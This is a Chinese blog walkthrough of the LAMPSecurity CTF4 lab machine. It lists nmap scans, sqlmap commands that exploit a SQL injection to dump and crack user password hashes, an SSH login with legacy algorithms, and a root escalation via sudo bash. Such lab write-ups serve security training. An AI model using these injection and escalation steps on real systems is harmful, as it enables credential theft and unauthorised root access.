红队靶机渗透-LAMPSecurityCTF4

最新推荐文章于 2024-07-08 16:37:01 发布
最新推荐文章于 2024-07-08 16:37:01 发布
阅读量368 收藏 7
点赞数 5
分类专栏: 靶机渗透 文章标签: 网络安全 安全 系统安全 web安全 安全威胁分析 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57967573/article/details/138349873
版权
文章详细描述了一次针对192.168.197.159主机的网络安全检查,包括端口扫描、发现开放的SSH和Web服务漏洞,利用SQL注入获取敏感信息,通过SSH登录提权的过程。
摘要由CSDN通过智能技术生成

1. 信息收集

主机发现

nmap -sn 192.168.197.0/24,目标IP地址为192.168.197.159

端口扫描

nmap --min-rate 10000 -p- 192.168.197.159   以最低速率10000对目标主机全端口进行扫描

可以看到目标系统开放了三个端口 22,25,80

详细信息扫描

nmap -sT -sV -O -p22,25,80 192.168.197.159

指定对目标进行TCP扫描,同时扫描服务的版本号以及操作系统类型

2. 攻击面分析

SQL注入

访问 web 服务,Blog 页面采用 id 传参,单引号测试存在 sql 注入

sqlmap自动化注入

sqlmap -u "http://192.168.197.159/index.html?page=blog&title=Blog&id=5'" --current-db

爆出当前数据库  ehks

 sqlmap -u "http://192.168.197.159/index.html?page=blog&title=Blog&id=5'" --tables -D ehks

存在user和blog两张表

sqlmap -u "http://192.168.197.159/index.html?page=blog&title=Blog&id=5'" --columns -T user -D ehks

爆出user表的列名 user_id,user_name,user_pass

sqlmap -u "http://192.168.197.159/index.html?page=blog&title=Blog&id=5'" --dump -C "user_id,user_nmae,user_pass"-T user -D ehks

读取数据,得到了一些用户名及对应的密码,并且 sqlmap 对 pass 的 md5 值自动做了破解

SSH登录

使用爆出的用户进行SSH登录

提示不能和目标主机通信,没有匹配的 key exchange

因为不同的 SSH 应用版本,协议及配置多少会有一些差别

指定key exchange 为报错信息提供的值 -oKexAlgorithms=iffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

尝试登录,再次报错,提示没有匹配的 host key type

指定host key为报错信息提供的值 -oHostKeyAlgorithms=ssh-rsa,ssh-dss

成功登录,获得初始权限

3. 提权

sudo -l 查看当前用户具有哪些系统权限

显示 dsevens 拥有ALL 全部系统权限

sudo /bin/bash 开启一个新的 bash 会话

成功提权至 root 用户

4. 总结

通过端口扫描发现22,25,80三个端口,22端口是ssh,一般把它的攻击向量排得靠后。80端口是优先级最高的,最可能暴露出大量攻击面的。
浏览web,发现blog页面存在sql注入,使用sqlmap自动化sql注入工具,得到了用户名及对应密码。
使用sql注入得到的用户名密码尝试ssh登录,成功进入系统,sudo -l查看用户具有全部系统权限,/bin/bash启动一个新的进程直接提取至root用户
cyber保安
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
红队靶机渗透-LAMPSecurity CTF7
m0_57967573的博客
05-02 16
在 /var/www/admin/inc/db.php 文件中看到 mysql 连接用户名为 root,密码为空······
红队笔记7-CTF4打靶流程-sqlmap注入-ssh远程登录
qq_63442530的博客
03-20 1338
CTF4这个靶场很简单,也是因为是09年的靶场了,sqlmap这种工具也没有诞生。思路:80端口->web->注入点->sqlmap获取账号密码->ssh登录打这个靶场也暴露出来我很多的缺点:1.在对web功能简单分析的过程中,老是被没有用的点浪费时间,对功能是否有利用点,分析的不到位,说到底还是自己的经验不足。2.过于依赖工具。红队笔记大佬还提到,进行渗透测试的过程中,我们不能单纯依赖nmap和sqlmap这种自动化工具,还是要了解漏洞的原理与代码的编写,使用工具表面上方便,但会有很多缺点。
红队笔记8-CTF5打靶流程-CMS漏洞-多用户信息泄露(vulnhub)
qq_63442530的博客
03-26 900
这次的靶场难度不高,但很需要经验,在提权过程中,把能有提权到尝试都去探索了一遍,发现都没有利用点,1.主机发现和端口扫描:端口扫描,发现存活了大量端口,其他很多端口不熟悉,依旧选择从80端口入手2.80端口:通过观察页面,发现是由NanoCMS搭建,存在后台登录窗口,根据想登录后台getshell的思路,寻找密码,最后在通过浏览器搜索到了NanoCMS的凭据泄露漏洞,成功登录后台。
红队打靶:LampSecurity:CTF4打靶思路详解(vulnhub)
Bossfrank的博客
06-19 1513
本文对vulnhub中靶机LampSecurity:CTF4进行了打靶。核心步骤就是发现数据库查询参数->使用sqlmap进行注入->拿到用户名和密码->ssh登录,由于靶机较为老旧,现在我们可以使用许多自动化脚本工具进行渗透,但核心还是要了解渗透的思路和各种针对漏洞的脚本编写原理,而非单纯的使用工具。
红队渗透打点工具-FindUpload
03-07
红队渗透打点工具-FindUpload】 在网络安全领域,红队渗透测试是模拟黑客攻击行为,以评估组织防御能力的一种重要方法。FindUpload作为一款红队打点工具,其核心功能在于帮助渗透测试专家有效地查找和定位网络...
深信服红队检测服务-2页
05-07
深信服红队检测服务是指以 APT 攻击者视角对用户目前现有防御措施进行深度渗透测试,对目标系统、人员、软硬件设备、基础架构进行多维度、多手段、对抗性的模拟攻击。红队检测旨在发现可能被黑客利用的薄弱点,并以...
AV_EDR 绕过红队村 PT-BR.pdf
10-06
网络安全渗透测试
goby-红队专用版-for-Windows
12-15
goby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队专用版_for_Windowsgoby_红队...
红队综合渗透框架SatanSword
01-14
web指纹识别,集成whatweb及wappalyzer所有指纹及自己收集的web服务器指纹1839条+cms指纹1936条。 漏洞PoC检测,提供360+PoC检测脚本内置在数据库中,同时支持漏洞查询和代码查看及一键批量检测功能。...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8326
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
亚信安全发布2024年6月威胁态势,高危漏洞猛增60%
亚信安全官方账号的博客
07-04 307
亚信安全发布2024年6月威胁态势
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
最新发布
olzorange的博客
07-08 135
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
【易捷海购-注册安全分析报告】
weixin_46641057的博客
07-05 1139
易捷国际作为中石化易捷旗下专业跨境电商平台,大概是因为和阿里有战略合作层面的关系, 所以在选的不是常见的类似极验、腾讯等滑动拼图类产品, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
[终端安全]-5 移动终端之操作系统安全
wendywm0496的博客
07-08 612
每个应用程序运行在一个独立的进程中,通过操作系统的内存管理单元(MMU)实现自己独立的虚拟地址空间,通常从0开始到某个最大值(例如,32位系统上为4GB),这个空间是进程私有的,MMU负责将虚拟地址转换为物理地址。当操作系统在不同进程之间切换时,会切换当前的页表,通过改变MMU中存储的页表基地址(通常存储在寄存器中)来实现,这样进程A和进程B即使使用相同的虚拟地址,也会映射到不同的物理地址。当用户启动应用A时,操作系统会为其创建一个新的进程,该进程由应用A的UID 10001运行;
[图解]SysML和EA建模住宅安全系统-09-流程指南·分析系统需求
rolt的专栏
07-04 876
然后这一步,你看,这里有个决策点
用XDR的思路保护API安全
AKAMAI_CHINA的博客
07-08 696
云计算飞速发展的今天,越来越多应用程序已经转为选择云原生架构,这就少不了Serverless、微服务、API等技术的协助。但同时也有越来越多的企业认识到,一定程度的“API安全”在整体安全与合规态势中发挥着至关重要的作用。然而,对很多企业来说,可能并不太明确API安全技术投资在其更广泛安全栈中的位置。
谷歌正在试行人脸识别办公室安全系统
网络研究观
07-04 1141
谷歌正在测试面部识别技术用于办公室安全,以帮助防止未经授权的个人进入园区。
案例精选 | 聚铭综合日志分析系统为江苏省电子口岸构建高效安全的贸易生态
juminfo的博客
07-05 594
江苏省电子口岸有限公司,成立于2009年,由江苏省贸促会携手南京海关、江苏检验检疫局及江苏海事局等部门共同出资组建。公司承载着推动江苏乃至长三角地区国际贸易便利化的重大使命,致力于打造一个集先进性、创新性、高效性于一体的电子口岸综合服务平台,为国际贸易的参与者提供全方位、一站式的服务。随着跨境电子商务的迅猛发展,每日处理的报关单证、物流信息等数据量呈指数级增长,这对公司的信息化管理能力提出了前所未有的挑战,特别是在安全合规、数据处理效率及业务连续性方面。
红队渗透测试lampiao
09-14
lampiao是一个用于红队渗透测试的虚拟机靶机。根据引用提供的信息,你可以通过以下步骤来进行该渗透测试: 1. 下载lampiao虚拟机:你可以从"https://download.vulnhub.com/lampiao/Lampiao.zip"下载lampiao虚拟机。下载完成后,解压缩文件并使用VirtualBox打开.ovf文件。 2. 扫描靶机信息:根据引用,你可以使用nmap工具对lampiao虚拟机进行详细的端口扫描,以了解是否有遗漏的端口。确保扫描到的所有端口都被纳入考虑范围。 3. 探索漏洞利用工具:根据引用,你可以搜寻一些漏洞的利用工具,如mirrors、FireFart和DirtyCOW。这些工具可能有助于你发现靶机中存在的漏洞,并帮助你进一步的渗透测试。 4. 利用漏洞进行渗透:一旦你发现了可能存在的漏洞,你可以使用相应的漏洞利用工具或手动方法来利用这些漏洞。这将帮助你获取更深入的访问权限,并探索靶机内部的潜在目标。 注意:在进行任何渗透测试之前,请确保你获得了合法的授权,并在合法的环境中进行测试。渗透测试是一项敏感的活动,需要遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值